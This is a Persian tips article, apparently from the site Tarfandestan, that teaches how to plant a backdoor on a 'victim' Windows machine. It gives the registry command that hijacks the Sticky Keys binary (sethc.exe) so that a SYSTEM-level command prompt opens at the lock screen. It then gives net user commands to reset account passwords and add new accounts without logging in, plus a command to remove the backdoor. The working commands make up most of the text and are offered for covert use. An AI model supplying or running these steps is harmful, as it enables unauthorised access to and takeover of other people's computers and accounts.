در این ترفند قصد داریم به معرفی راهی بپردازیم که از طریق آن میتوانید در صفحهی ورود به حسابهای کاربری ویندوز و پیش از وارد کردن نام کاربری و پسورد، پنجرهی Command Prompt ویندوز را باز کنید. ااگر با CMD ویندوز آشنایی داشته باشید حتماً میدانید که دستیابی به این پنجره پیش از ورود به محیط ویندوز، آن هم با دسترسی Administrator یعنی دسترسی به همهچیز! از این رو، تیتر این ترفند را میتوان «ایجاد یک راه مخفی در سیستم قربانی به منظور تغییر رمز عبور و ورود به ویندوز» دانست، چرا که اگر این کار را در یک سیستم انجام دهید، از این پس میتوانید به صورت مخفیانه رمز عبور حسابهای کاربری را تغییر دهید، حساب کاربری جدید بسازید و حتی در همان صفحهی Lock، فایلهای اجرایی نظیر نرمافزارهای مختلف را نیز باز کنید. با این ترفند میتوانید به نوعی یک Backdoor ایجاد کنید. Backdoor راه عبوری است که به صورت مخفیانه از این پس برای شما برای دسترسی به ویندوز پدید میآید. این ترفند بر روی کلیه نسخههای ویندوز امکانپذیر است.
بدین منظور:
ابتدا (ترفندستان) درمحیط ویندوز کلیدهای ترکیبی Win+R را فشار دهید.
در پنجرهی Run عبارت cmd را وارد کرده و Enter بزنید.
پس از باز شدن پنجرهی Command Prompt دستور زیر را وارد کرده و Enter بزنید:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
نمایش پیغام The operation completed successfully به معنای موفقیتآمیز بودن کار است.
اکنون کافی است از حساب کاربری Log Off کنید و در صفحهی ورود به حسابهای کاربری ویندوز یا همان صفحهی Lock، کلید Shift را 5 بار پشت هم فشار دهید و یا کلیدهای ترکیبی Alt+Shift+PrintScreen را وارد کنید.
خواهید دید که با این کار پنجرهی CMD نمایان میشود.
اکنون (ترفندستان) میتوانید کارهای دلخواه خود با CMD نظیر اجرای برنامههای مختلف، تغییر رمز عبور یک حساب کاربری یا ساخت یک حساب کاربری جدید را انجام دهید.
به عنوان مثال با وارد کردن عبارت taskmgr به Task Manager دسترسی خواهید داشت.
و یا با وارد کردن دستور زیر میتوانید رمز عبور یک حساب کاربری را تغییر دهید:
net user user_name new_password
همچنین با دستور زیر میتوان یک حساب کاربری جدید ایجاد کرد:
net user user_name password /add
در این دستورات به جای user_name نام حساب کاربری مورد نظر و به جای new_password رمز عبور مد نظر خود را قرار دهید.
برای پاک کردن این Backdoor نیز میتوانید از این دستور در محیط CMD استفاده کنید:
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"